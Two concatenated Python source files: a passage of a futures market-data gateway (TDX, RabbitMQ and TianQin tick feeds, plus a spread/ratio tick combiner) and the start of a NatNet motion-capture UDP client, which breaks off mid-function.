self.gateway.write_error(u'tdx thead.run exception:{},{}'.format(str(ex), traceback.format_exc()))
self.gateway.write_error(u'tdx查询线程 {}退出'.format(datetime.now()))
def process_index_req(self):
"""处理板块获取指数行情tick"""
# 获取通达信指数板块所有行情
rt_list = self.api.get_instrument_quote_list(42, 3, 0, 100)
if rt_list is None or len(rt_list) == 0:
self.gateway.write_log(u'tdx: rt_list为空')
return
# 记录该接口的行情最后更新时间
self.last_tick_dt = datetime.now()
for d in list(rt_list):
tdx_symbol = d.get('code', None)
if tdx_symbol not in self.registered_symbol_set and tdx_symbol is not None:
continue
# tdx_symbol => vn_symbol
vn_symbol = self.symbol_vn_dict.get(tdx_symbol, None)
if vn_symbol is None:
self.gateway.write_error(u'self.symbol_vn_dict 取不到映射得:{}'.format(tdx_symbol))
continue
# vn_symbol => exchange
exchange = self.symbol_exchange_dict.get(tdx_symbol, None)
underlying_symbol = get_underlying_symbol(vn_symbol)
if exchange is None:
symbol_info = future_contracts.get(underlying_symbol, None)
if not symbol_info:
continue
exchange_value = symbol_info.get('exchange', None)
exchange = Exchange(exchange_value)
if exchange is None:
continue
self.symbol_exchange_dict.update({tdx_symbol: exchange})
tick_datetime = datetime.now()
# 修正毫秒
last_tick = self.symbol_tick_dict.get(vn_symbol, None)
if (last_tick is not None) and tick_datetime.replace(microsecond=0) == last_tick.datetime:
# 与上一个tick的时间(去除毫秒后)相同,修改为500毫秒
tick_datetime = tick_datetime.replace(microsecond=500)
else:
tick_datetime = tick_datetime.replace(microsecond=0)
tick = TickData(gateway_name=self.gateway_name,
symbol=vn_symbol,
exchange=exchange,
datetime=tick_datetime)
tick.pre_close = float(d.get('ZuoJie', 0.0))
tick.high_price = float(d.get('ZuiGao', 0.0))
tick.open_price = float(d.get('JinKai', 0.0))
tick.low_price = float(d.get('ZuiDi', 0.0))
tick.last_price = float(d.get('MaiChu', 0.0))
tick.volume = int(d.get('XianLiang', 0))
tick.open_interest = d.get('ChiCangLiang')
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
tick.date = tick.datetime.strftime('%Y-%m-%d')
tick.trading_day = get_trading_date(tick.datetime)
# 指数没有涨停和跌停,就用昨日收盘价正负10%
tick.limit_up = tick.pre_close * 1.1
tick.limit_down = tick.pre_close * 0.9
# CTP只有一档行情
tick.bid_price_1 = float(d.get('MaiRuJia', 0.0))
tick.bid_volume_1 = int(d.get('MaiRuLiang', 0))
tick.ask_price_1 = float(d.get('MaiChuJia', 0.0))
tick.ask_volume_1 = int(d.get('MaiChuLiang', 0))
# 排除非交易时间得tick
if tick.exchange is Exchange.CFFEX:
if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
continue
if tick.datetime.hour == 9 and tick.datetime.minute < 15:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
if tick.datetime.hour == 15 and tick.datetime.minute >= 15 and underlying_symbol in ['T', 'TF', 'TS']:
continue
if tick.datetime.hour == 15 and underlying_symbol in ['IH', 'IF', 'IC']:
continue
else: # 大商所/郑商所,上期所,上海能源
# 排除非开盘小时
if tick.datetime.hour in [3, 4, 5, 6, 7, 8, 12, 15, 16, 17, 18, 19, 20]:
continue
# 排除早盘 10:15~10:30
if tick.datetime.hour == 10 and 15 <= tick.datetime.minute < 30:
continue
# 排除早盘 11:30~12:00
if tick.datetime.hour == 11 and tick.datetime.minute >= 30:
continue
# 排除午盘 13:00 ~13:30
if tick.datetime.hour == 13 and tick.datetime.minute < 30:
continue
# 排除凌晨2:30~3:00
if tick.datetime.hour == 2 and tick.datetime.minute >= 30:
continue
# 排除大商所/郑商所夜盘数据上期所夜盘数据 23:00 收盘
if underlying_symbol in NIGHT_MARKET_23:
if tick.datetime.hour in [23, 0, 1, 2]:
continue
# 排除上期所夜盘数据 1:00 收盘
if underlying_symbol in NIGHT_MARKET_SQ2:
if tick.datetime.hour in [1, 2]:
continue
# 排除日盘合约在夜盘得数据
if underlying_symbol in MARKET_DAY_ONLY and (tick.datetime.hour < 9 or tick.datetime.hour > 16):
# self.write_log(u'排除日盘合约{}在夜盘得数据'.format(short_symbol))
continue
# self.gateway.write_log(f'{tick.__dict__}')
self.symbol_tick_dict[tick.symbol] = tick
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
class SubMdApi():
"""
RabbitMQ Subscriber 数据行情接收API
"""
def __init__(self, gateway):
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.symbol_tick_dict = {} # 合约与最后一个Tick得字典
self.registed_symbol_set = set() # 订阅的合约记录集
self.sub = None
self.setting = {}
self.connect_status = False
self.thread = None
def connect(self, setting={}):
"""连接"""
self.setting = setting
try:
self.sub = subscriber(
host=self.setting.get('host', 'localhost'),
port=self.setting.get('port', 5672),
user=self.setting.get('user', 'admin'),
password=self.setting.get('password', 'admin'),
exchange=self.setting.get('exchange', 'x_fanout_idx_tick'))
self.sub.set_callback(self.on_message)
self.thread = Thread(target=self.sub.start)
self.thread.start()
self.connect_status = True
self.gateway.status.update({'sub_con': True, 'sub_con_time': datetime.now().strftime('%Y-%m-%d %H:%M:%S')})
except Exception as ex:
self.gateway.write_error(u'连接RabbitMQ {} 异常:{}'.format(self.setting, str(ex)))
self.gateway.write_error(traceback.format_exc())
self.connect_status = False
def on_message(self, chan, method_frame, _header_frame, body, userdata=None):
# print(" [x] %r" % body)
try:
str_tick = body.decode('utf-8')
d = json.loads(str_tick)
d.pop('rawData', None)
d = self.conver_update(d)
symbol = d.pop('symbol', None)
str_datetime = d.pop('datetime', None)
if symbol not in self.registed_symbol_set or str_datetime is None:
return
if '.' in str_datetime:
dt = datetime.strptime(str_datetime, '%Y-%m-%d %H:%M:%S.%f')
else:
dt = datetime.strptime(str_datetime, '%Y-%m-%d %H:%M:%S')
tick = TickData(gateway_name=self.gateway_name,
exchange=Exchange(d.get('exchange')),
symbol=symbol,
datetime=dt)
d.pop('exchange', None)
d.pop('symbol', None)
tick.__dict__.update(d)
self.symbol_tick_dict[symbol] = tick
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
except Exception as ex:
self.gateway.write_error(u'RabbitMQ on_message 异常:{}'.format(str(ex)))
self.gateway.write_error(traceback.format_exc())
def conver_update(self, d):
"""转换dict, vnpy1 tick dict => vnpy2 tick dict"""
if 'vtSymbol' not in d:
return d
symbol= d.get('symbol')
exchange = d.get('exchange')
vtSymbol = d.pop('vtSymbol', symbol)
if '.' not in symbol:
d.update({'vt_symbol': f'{symbol}.{exchange}'})
else:
d.update({'vt_symbol': f'{symbol}.{Exchange.LOCAL.value}'})
# 成交数据
d.update({'last_price': d.pop('lastPrice',0.0)}) # 最新成交价
d.update({'last_volume': d.pop('lastVolume', 0)}) # 最新成交量
d.update({'open_interest': d.pop('openInterest', 0)}) # 昨持仓量
d.update({'open_interest': d.pop('tradingDay', get_trading_date())})
# 常规行情
d.update({'open_price': d.pop('openPrice', 0)}) # 今日开盘价
d.update({'high_price': d.pop('highPrice', 0)}) # 今日最高价
d.update({'low_price': d.pop('lowPrice', 0)}) # 今日最低价
d.update({'pre_close': d.pop('preClosePrice', 0)}) # 昨收盘价
d.update({'limit_up': d.pop('upperLimit', 0)}) # 涨停价
d.update({'limit_down': d.pop('lowerLimit', 0)}) # 跌停价
# 五档行情
d.update({'bid_price_1': d.pop('bidPrice1', 0.0)})
d.update({'bid_price_2': d.pop('bidPrice2', 0.0)})
d.update({'bid_price_3': d.pop('bidPrice3', 0.0)})
d.update({'bid_price_4': d.pop('bidPrice4', 0.0)})
d.update({'bid_price_5': d.pop('bidPrice5', 0.0)})
d.update({'ask_price_1': d.pop('askPrice1', 0.0)})
d.update({'ask_price_2': d.pop('askPrice2', 0.0)})
d.update({'ask_price_3': d.pop('askPrice3', 0.0)})
d.update({'ask_price_4': d.pop('askPrice4', 0.0)})
d.update({'ask_price_5': d.pop('askPrice5', 0.0)})
d.update({'bid_volume_1': d.pop('bidVolume1', 0.0)})
d.update({'bid_volume_2': d.pop('bidVolume2', 0.0)})
d.update({'bid_volume_3': d.pop('bidVolume3', 0.0)})
d.update({'bid_volume_4': d.pop('bidVolume4', 0.0)})
d.update({'bid_volume_5': d.pop('bidVolume5', 0.0)})
d.update({'ask_volume_1': d.pop('askVolume1', 0.0)})
d.update({'ask_volume_2': d.pop('askVolume2', 0.0)})
d.update({'ask_volume_3': d.pop('askVolume3', 0.0)})
d.update({'ask_volume_4': d.pop('askVolume4', 0.0)})
d.update({'ask_volume_5': d.pop('askVolume5', 0.0)})
return d
def close(self):
"""退出API"""
self.gateway.write_log(u'退出rabbit行情订阅API')
self.connection_status = False
try:
if self.sub:
self.gateway.write_log(u'关闭订阅器')
self.sub.close()
if self.thread is not None:
self.gateway.write_log(u'关闭订阅器接收线程')
self.thread.join()
except Exception as ex:
self.gateway.write_error(u'退出rabbitMQ行情api异常:{}'.format(str(ex)))
# ----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅合约"""
# 这里的设计是,如果尚未登录就调用了订阅方法
# 则先保存订阅请求,登录完成后会自动订阅
vn_symbol = str(subscribeReq.symbol)
vn_symbol = vn_symbol.upper()
if vn_symbol not in self.registed_symbol_set:
self.registed_symbol_set.add(vn_symbol)
self.gateway.write_log(u'RabbitMQ行情订阅 {}'.format(str(vn_symbol)))
class TqMdApi():
"""天勤行情API"""
def __init__(self, gateway):
""""""
super().__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.api = None
self.is_connected = False
self.subscribe_array = []
# 行情对象列表
self.quote_objs = []
# 数据更新线程
self.update_thread = None
# 所有的合约
self.all_instruments = []
self.ticks = {}
def connect(self, setting):
""""""
try:
from tqsdk import TqApi
self.api = TqApi()
except Exception as e:
self.gateway.write_log(f'天勤行情API接入异常'.format(str(e)))
if self.api:
self.is_connected = True
self.gateway.write_log(f'天勤行情API已连接')
self.update_thread = Thread(target=self.update)
self.update_thread.start()
def generate_tick_from_quote(self, vt_symbol, quote) -> TickData:
"""
生成TickData
"""
# 清洗 nan
quote = {k: 0 if v != v else v for k, v in quote.items()}
symbol, exchange = extract_vt_symbol(vt_symbol)
tick = TickData(
symbol=symbol,
exchange=exchange,
datetime=datetime.strptime(quote["datetime"], "%Y-%m-%d %H:%M:%S.%f"),
name=symbol,
volume=quote["volume"],
open_interest=quote["open_interest"],
last_price=quote["last_price"],
limit_up=quote["upper_limit"],
limit_down=quote["lower_limit"],
open_price=quote["open"],
high_price=quote["highest"],
low_price=quote["lowest"],
pre_close=quote["pre_close"],
bid_price_1=quote["bid_price1"],
bid_price_2=quote["bid_price2"],
bid_price_3=quote["bid_price3"],
bid_price_4=quote["bid_price4"],
bid_price_5=quote["bid_price5"],
ask_price_1=quote["ask_price1"],
ask_price_2=quote["ask_price2"],
ask_price_3=quote["ask_price3"],
ask_price_4=quote["ask_price4"],
ask_price_5=quote["ask_price5"],
bid_volume_1=quote["bid_volume1"],
bid_volume_2=quote["bid_volume2"],
bid_volume_3=quote["bid_volume3"],
bid_volume_4=quote["bid_volume4"],
bid_volume_5=quote["bid_volume5"],
ask_volume_1=quote["ask_volume1"],
ask_volume_2=quote["ask_volume2"],
ask_volume_3=quote["ask_volume3"],
ask_volume_4=quote["ask_volume4"],
ask_volume_5=quote["ask_volume5"],
gateway_name=self.gateway_name
)
if symbol.endswith('99') and tick.ask_price_1 == 0.0 and tick.bid_price_1 == 0.0:
price_tick = quote['price_tick']
if isinstance(price_tick, float) or isinstance(price_tick,int):
tick.ask_price_1 = tick.last_price + price_tick
tick.ask_volume_1 = 1
tick.bid_price_1 = tick.last_price - price_tick
tick.bid_volume_1 = 1
return tick
def update(self) -> None:
"""
更新行情/委托/账户/持仓
"""
while self.api.wait_update():
# 更新行情信息
for vt_symbol, quote in self.quote_objs:
if self.api.is_changing(quote):
tick = self.generate_tick_from_quote(vt_symbol, quote)
if tick:
self.gateway.on_tick(tick)
self.gateway.on_custom_tick(tick)
def subscribe(self, req: SubscribeRequest) -> None:
"""
订阅行情
"""
if req.vt_symbol not in self.subscribe_array:
symbol, exchange = extract_vt_symbol(req.vt_symbol)
try:
quote = self.api.get_quote(vt_to_tq_symbol(symbol, exchange))
self.quote_objs.append((req.vt_symbol, quote))
self.subscribe_array.append(req.vt_symbol)
except Exception as ex:
self.gateway.write_log('订阅天勤行情异常:{}'.format(str(ex)))
def query_contracts(self) -> None:
""""""
self.all_instruments = [
v for k, v in self.api._data["quotes"].items() if v["expired"] == False
]
for contract in self.all_instruments:
if (
"SSWE" in contract["instrument_id"]
or "CSI" in contract["instrument_id"]
):
# vnpy没有这两个交易所,需要可以自行修改vnpy代码
continue
vt_symbol = tq_to_vt_symbol(contract["instrument_id"])
symbol, exchange = extract_vt_symbol(vt_symbol)
if TQ2VT_TYPE[contract["ins_class"]] == Product.OPTION:
contract_data = ContractData(
symbol=symbol,
exchange=exchange,
name=symbol,
product=TQ2VT_TYPE[contract["ins_class"]],
size=contract["volume_multiple"],
pricetick=contract["price_tick"],
history_data=True,
option_strike=contract["strike_price"],
option_underlying=tq_to_vt_symbol(contract["underlying_symbol"]),
option_type=OptionType[contract["option_class"]],
option_expiry=datetime.fromtimestamp(contract["expire_datetime"]),
option_index=tq_to_vt_symbol(contract["underlying_symbol"]),
gateway_name=self.gateway_name,
)
else:
contract_data = ContractData(
symbol=symbol,
exchange=exchange,
name=symbol,
product=TQ2VT_TYPE[contract["ins_class"]],
size=contract["volume_multiple"],
pricetick=contract["price_tick"],
history_data=True,
gateway_name=self.gateway_name,
)
self.gateway.on_contract(contract_data)
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""
获取历史数据
"""
symbol = req.symbol
exchange = req.exchange
interval = req.interval
start = req.start
end = req.end
# 天勤需要的数据
tq_symbol = vt_to_tq_symbol(symbol, exchange)
tq_interval = INTERVAL_VT2TQ.get(interval)
end += timedelta(1)
total_days = end - start
# 一次最多只能下载 8964 根Bar
min_length = min(8964, total_days.days * 500)
df = self.api.get_kline_serial(tq_symbol, tq_interval, min_length).sort_values(
by=["datetime"]
)
# 时间戳对齐
df["datetime"] = pd.to_datetime(df["datetime"] + TIME_GAP)
# 过滤开始结束时间
df = df[(df["datetime"] >= start - timedelta(days=1)) & (df["datetime"] < end)]
data: List[BarData] = []
if df is not None:
for ix, row in df.iterrows():
bar = BarData(
symbol=symbol,
exchange=exchange,
interval=interval,
datetime=row["datetime"].to_pydatetime(),
open_price=row["open"],
high_price=row["high"],
low_price=row["low"],
close_price=row["close"],
volume=row["volume"],
open_interest=row.get("close_oi", 0),
gateway_name=self.gateway_name,
)
data.append(bar)
return data
def close(self) -> None:
""""""
try:
if self.api:
self.api.close()
self.is_connected = False
if self.update_thread:
self.update_thread.join()
except Exception as e:
self.gateway.write_log('退出天勤行情api异常:{}'.format(str(e)))
class TickCombiner(object):
"""
Tick合成类
"""
def __init__(self, gateway, setting):
self.gateway = gateway
self.gateway_name = self.gateway.gateway_name
self.gateway.write_log(u'创建tick合成类:{}'.format(setting))
self.symbol = setting.get('symbol', None)
self.leg1_symbol = setting.get('leg1_symbol', None)
self.leg2_symbol = setting.get('leg2_symbol', None)
self.leg1_ratio = setting.get('leg1_ratio', 1) # 腿1的数量配比
self.leg2_ratio = setting.get('leg2_ratio', 1) # 腿2的数量配比
self.price_tick = setting.get('price_tick', 1) # 合成价差加比后的最小跳动
# 价差
self.is_spread = setting.get('is_spread', False)
# 价比
self.is_ratio = setting.get('is_ratio', False)
self.last_leg1_tick = None
self.last_leg2_tick = None
# 价差日内最高/最低价
self.spread_high = None
self.spread_low = None
# 价比日内最高/最低价
self.ratio_high = None
self.ratio_low = None
# 当前交易日
self.trading_day = None
if self.is_ratio and self.is_spread:
self.gateway.write_error(u'{}参数有误,不能同时做价差/加比.setting:{}'.format(self.symbol, setting))
return
self.gateway.write_log(u'初始化{}合成器成功'.format(self.symbol))
if self.is_spread:
self.gateway.write_log(
u'leg1:{} * {} - leg2:{} * {}'.format(self.leg1_symbol, self.leg1_ratio, self.leg2_symbol,
self.leg2_ratio))
if self.is_ratio:
self.gateway.write_log(
u'leg1:{} * {} / leg2:{} * {}'.format(self.leg1_symbol, self.leg1_ratio, self.leg2_symbol,
self.leg2_ratio))
def on_tick(self, tick):
"""OnTick处理"""
combinable = False
if tick.symbol == self.leg1_symbol:
# leg1合约
self.last_leg1_tick = tick
if self.last_leg2_tick is not None:
if self.last_leg1_tick.datetime.replace(microsecond=0) == self.last_leg2_tick.datetime.replace(
microsecond=0):
combinable = True
elif tick.symbol == self.leg2_symbol:
# leg2合约
self.last_leg2_tick = tick
if self.last_leg1_tick is not None:
if self.last_leg2_tick.datetime.replace(microsecond=0) == self.last_leg1_tick.datetime.replace(
microsecond=0):
combinable = True
# 不能合并
if not combinable:
return
if not self.is_ratio and not self.is_spread:
return
# 以下情况,基本为单腿涨跌停,不合成价差/价格比 Tick
if (self.last_leg1_tick.ask_price_1 == 0 or self.last_leg1_tick.bid_price_1 == self.last_leg1_tick.limit_up) \
and self.last_leg1_tick.ask_volume_1 == 0:
self.gateway.write_log(
u'leg1:{0}涨停{1},不合成价差Tick'.format(self.last_leg1_tick.vt_symbol, self.last_leg1_tick.bid_price_1))
return
if (self.last_leg1_tick.bid_price_1 == 0 or self.last_leg1_tick.ask_price_1 == self.last_leg1_tick.limit_down) \
and self.last_leg1_tick.bid_volume_1 == 0:
self.gateway.write_log(
u'leg1:{0}跌停{1},不合成价差Tick'.format(self.last_leg1_tick.vt_symbol, self.last_leg1_tick.ask_price_1))
return
if (self.last_leg2_tick.ask_price_1 == 0 or self.last_leg2_tick.bid_price_1 == self.last_leg2_tick.limit_up) \
and self.last_leg2_tick.ask_volume_1 == 0:
self.gateway.write_log(
u'leg2:{0}涨停{1},不合成价差Tick'.format(self.last_leg2_tick.vt_symbol, self.last_leg2_tick.bid_price_1))
return
if (self.last_leg2_tick.bid_price_1 == 0 or self.last_leg2_tick.ask_price_1 == self.last_leg2_tick.limit_down) \
and self.last_leg2_tick.bid_volume_1 == 0:
self.gateway.write_log(
u'leg2:{0}跌停{1},不合成价差Tick'.format(self.last_leg2_tick.vt_symbol, self.last_leg2_tick.ask_price_1))
return
if self.trading_day != tick.trading_day:
self.trading_day = tick.trading_day
self.spread_high = None
self.spread_low = None
self.ratio_high = None
self.ratio_low = None
if self.is_spread:
spread_tick = TickData(gateway_name=self.gateway_name,
symbol=self.symbol,
exchange=Exchange.SPD,
datetime=tick.datetime)
spread_tick.trading_day = tick.trading_day
spread_tick.date = tick.date
spread_tick.time = tick.time
# 叫卖价差=leg1.ask_price_1 * 配比 - leg2.bid_price_1 * 配比,volume为两者最小
spread_tick.ask_price_1 = round_to(target=self.price_tick,
value=self.last_leg1_tick.ask_price_1 * self.leg1_ratio - self.last_leg2_tick.bid_price_1 * self.leg2_ratio)
spread_tick.ask_volume_1 = min(self.last_leg1_tick.ask_volume_1, self.last_leg2_tick.bid_volume_1)
# 叫买价差=leg1.bid_price_1 * 配比 - leg2.ask_price_1 * 配比,volume为两者最小
spread_tick.bid_price_1 = round_to(target=self.price_tick,
value=self.last_leg1_tick.bid_price_1 * self.leg1_ratio - self.last_leg2_tick.ask_price_1 * self.leg2_ratio)
spread_tick.bid_volume_1 = min(self.last_leg1_tick.bid_volume_1, self.last_leg2_tick.ask_volume_1)
# 最新价
spread_tick.last_price = round_to(target=self.price_tick,
value=(spread_tick.ask_price_1 + spread_tick.bid_price_1) / 2)
# 昨收盘价
if self.last_leg2_tick.pre_close > 0 and self.last_leg1_tick.pre_close > 0:
spread_tick.pre_close = round_to(target=self.price_tick,
value=self.last_leg1_tick.pre_close * self.leg1_ratio - self.last_leg2_tick.pre_close * self.leg2_ratio)
# 开盘价
if self.last_leg2_tick.open_price > 0 and self.last_leg1_tick.open_price > 0:
spread_tick.open_price = round_to(target=self.price_tick,
value=self.last_leg1_tick.open_price * self.leg1_ratio - self.last_leg2_tick.open_price * self.leg2_ratio)
# 最高价
if self.spread_high:
self.spread_high = max(self.spread_high, spread_tick.ask_price_1)
else:
self.spread_high = spread_tick.ask_price_1
spread_tick.high_price = self.spread_high
# 最低价
if self.spread_low:
self.spread_low = min(self.spread_low, spread_tick.bid_price_1)
else:
self.spread_low = spread_tick.bid_price_1
spread_tick.low_price = self.spread_low
self.gateway.on_tick(spread_tick)
if self.is_ratio:
ratio_tick = TickData(
gateway_name=self.gateway_name,
symbol=self.symbol,
exchange=Exchange.SPD,
datetime=tick.datetime
)
ratio_tick.trading_day = tick.trading_day
ratio_tick.date = tick.date
ratio_tick.time = tick.time
# 比率tick = (腿1 * 腿1 手数 / 腿2价格 * 腿2手数) 百分比
ratio_tick.ask_price_1 = 100 * self.last_leg1_tick.ask_price_1 * self.leg1_ratio \
/ (self.last_leg2_tick.bid_price_1 * self.leg2_ratio) # noqa
ratio_tick.ask_price_1 = round_to(
target=self.price_tick,
value=ratio_tick.ask_price_1
)
ratio_tick.ask_volume_1 = min(self.last_leg1_tick.ask_volume_1, self.last_leg2_tick.bid_volume_1)
ratio_tick.bid_price_1 = 100 * self.last_leg1_tick.bid_price_1 * self.leg1_ratio \
/ (self.last_leg2_tick.ask_price_1 * self.leg2_ratio) # noqa
ratio_tick.bid_price_1 = round_to(
target=self.price_tick,
value=ratio_tick.bid_price_1
)
ratio_tick.bid_volume_1 = min(self.last_leg1_tick.bid_volume_1, self.last_leg2_tick.ask_volume_1)
ratio_tick.last_price = (ratio_tick.ask_price_1 + ratio_tick.bid_price_1) / 2
ratio_tick.last_price = round_to(
target=self.price_tick,
value=ratio_tick.last_price
)
# 昨收盘价
if self.last_leg2_tick.pre_close > 0 and self.last_leg1_tick.pre_close > 0:
ratio_tick.pre_close = 100 * self.last_leg1_tick.pre_close * self.leg1_ratio / (
self.last_leg2_tick.pre_close * self.leg2_ratio) # noqa
ratio_tick.pre_close = round_to(
target=self.price_tick,
value=ratio_tick.pre_close
)
# 开盘价
if self.last_leg2_tick.open_price > 0 and self.last_leg1_tick.open_price > 0:
ratio_tick.open_price = 100 * self.last_leg1_tick.open_price * self.leg1_ratio / (
self.last_leg2_tick.open_price * self.leg2_ratio) # noqa
ratio_tick.open_price = round_to(
target=self.price_tick,
value=ratio_tick.open_price
)
# 最高价
if self.ratio_high:
self.ratio_high = max(self.ratio_high, ratio_tick.ask_price_1)
else:
self.ratio_high = ratio_tick.ask_price_1
ratio_tick.high_price = self.spread_high
# 最低价
if self.ratio_low:
self.ratio_low = min(self.ratio_low, ratio_tick.bid_price_1)
else:
self.ratio_low = ratio_tick.bid_price_1
ratio_tick.low_price = self.spread_low
self.gateway.on_tick(ratio_tick)
|
NatNetClient.py
|
"""
This file was taken from the NatNet SDK and modified.
NatNet Version 2.10.0 (06/15/2016)
"""
import socket
import struct
from threading import Thread
def trace(*args):
pass # print("".join(map(str, args)))
# Create structs for reading various object types to speed up parsing.
Vector3 = struct.Struct('<fff')
Quaternion = struct.Struct('<ffff')
FloatValue = struct.Struct('<f')
DoubleValue = struct.Struct('<d')
class NatNetClient:
def __init__(self, server_ip_address="192.168.0.105", local_ip_address="192.168.0.147",
multicast_address="239.255.42.99", command_port=1510, data_port=1511):
# Change this value to the IP address of the NatNet server.
self.server_ip_address = server_ip_address
# Change this value to the IP address of your local network interface
self.local_ip_address = local_ip_address
# This should match the multicast address listed in Motive's streaming settings.
self.multicast_address = multicast_address
# NatNet Command channel
self.command_port = command_port
# NatNet Data channel
self.data_port = data_port
# Set this to a callback method of your choice to receive new frame.
self.new_frame_listener = None
# Set this to a callback method of your choice to receive per-rigid-body data at each frame.
self.rigid_body_listener = None
# NatNet stream version. This will be updated to the actual version the server is using during initialization.
self.__nat_net_stream_version = (2, 10, 0, 0)
# Client/server message ids
NAT_PING = 0
NAT_PINGRESPONSE = 1
NAT_REQUEST = 2 # Unrecognized request
NAT_RESPONSE = 3
NAT_REQUEST_MODELDEF = 4
NAT_MODELDEF = 5
NAT_REQUEST_FRAMEOFDATA = 6 # Unrecognized request
NAT_FRAMEOFDATA = 7
NAT_MESSAGESTRING = 8
NAT_DISCONNECT = 9
NAT_UNRECOGNIZED_REQUEST = 100
# Create a data socket to attach to the NatNet stream
def __create_data_socket(self, port):
result = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM,
socket.IPPROTO_UDP) # UDP
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# buffer size to 1 for real-time display
result.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1)
result.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
socket.inet_aton(self.multicast_address) + socket.inet_aton(self.local_ip_address))
result.bind(('', port))
return result
# Create a command socket to attach to the NatNet stream
def __create_command_socket(self):
result = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
result.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
result.bind(('', 0))
result.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
return result
# Unpack a rigid body object from a data packet
def __unpack_rigid_body(self, data):
offset = 0
# ID (4 bytes)
rigid_body_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
rigid_body_name = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Rigid Body ID:", rigid_body_id)
# Position and orientation
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
trace("\tPosition:", pos[0], ",", pos[1], ",", pos[2])
rot = Quaternion.unpack(data[offset:offset + 16])
offset += 16
trace("\tOrientation:", rot[0], ",", rot[1], ",", rot[2], ",", rot[3])
# Send information to any listener.
if self.rigid_body_listener is not None:
self.rigid_body_listener(rigid_body_id, pos, rot)
trace("\tPosition:", pos[0], ",", pos[1], ",", pos[2])
# RB Marker Data ( Before version 3.0. After Version 3.0 Marker data is in description )
if self.__nat_net_stream_version[0] < 3 and self.__nat_net_stream_version[0] != 0:
# Marker count (4 bytes)
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
marker_count_range = range(0, marker_count)
trace("\tMarker Count:", marker_count)
# Marker positions
for i in marker_count_range:
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
trace("\tMarker", i, ":", pos[0], ",", pos[1], ",", pos[2])
if self.__nat_net_stream_version[0] >= 2:
# Marker ID's
for i in marker_count_range:
marker_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("\tMarker ID", i, ":", marker_id)
# Marker sizes
for i in marker_count_range:
size = FloatValue.unpack(data[offset:offset + 4])
offset += 4
trace("\tMarker Size", i, ":", size[0])
if self.__nat_net_stream_version[0] >= 2:
marker_error, = FloatValue.unpack(data[offset:offset + 4])
offset += 4
trace("\tMarker Error:", marker_error)
# Version 2.6 and later
if (((self.__nat_net_stream_version[0] == 2) and (self.__nat_net_stream_version[1] >= 6)) or
self.__nat_net_stream_version[0] > 2 or self.__nat_net_stream_version[0] == 0):
param, = struct.unpack('h', data[offset:offset + 2])
tracking_valid = (param & 0x01) != 0
offset += 2
trace("\tTracking Valid:", 'True' if tracking_valid else 'False')
return offset
# Unpack a skeleton object from a data packet
def __unpack_skeleton(self, data):
offset = 0
skeleton_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Skeleton ID:", skeleton_id)
rigid_body_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Rigid Body Count:", rigid_body_count)
for j in range(0, rigid_body_count):
offset += self.__unpack_rigid_body(data[offset:])
return offset
# Unpack data from a motion capture frame message
def __unpack_mocap_data(self, data):
trace("Begin MoCap Frame\n-----------------\n")
data = memoryview(data)
offset = 0
# Frame number (4 bytes)
frame_number = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Frame:", frame_number)
# Marker set count (4 bytes)
marker_set_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Marker Set Count:", marker_set_count)
for i in range(0, marker_set_count):
# Model name
model_name, separator, remainder = bytes(data[offset:]).partition(b'\0')
offset += len(model_name) + 1
trace("Model Name:", model_name.decode('utf-8'))
# Marker count (4 bytes)
marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Marker Count:", marker_count)
for j in range(0, marker_count):
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
# trace( "\tMarker", j, ":", pos[0],",", pos[1],",", pos[2] )
# Unlabeled markers count (4 bytes)
unlabeled_markers_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Unlabeled Markers Count:", unlabeled_markers_count)
for i in range(0, unlabeled_markers_count):
pos = Vector3.unpack(data[offset:offset + 12])
offset += 12
trace("\tMarker", i, ":", pos[0], ",", pos[1], ",", pos[2])
# Rigid body count (4 bytes)
rigid_body_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Rigid Body Count:", rigid_body_count)
for i in range(0, rigid_body_count):
offset += self.__unpack_rigid_body(data[offset:])
# Version 2.1 and later
skeleton_count = 0
if not (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] > 0) \
or self.__nat_net_stream_version[0] > 2:
skeleton_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Skeleton Count:", skeleton_count)
for i in range(0, skeleton_count):
offset += self.__unpack_skeleton(data[offset:])
# Labeled markers (Version 2.3 and later)
labeled_marker_count = 0
if (self.__nat_net_stream_version[0] == 2 and self.__nat_net_stream_version[1] > 3) \
or self.__nat_net_stream_version[0] > 2:
labeled_marker_count = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
trace("Labeled Marker Count:", labeled_marker_count)
for i in range(0, labeled_marker_count):
labeled_marker_id = int.from_bytes(data[offset:offset + 4], byteorder='little')
offset += 4
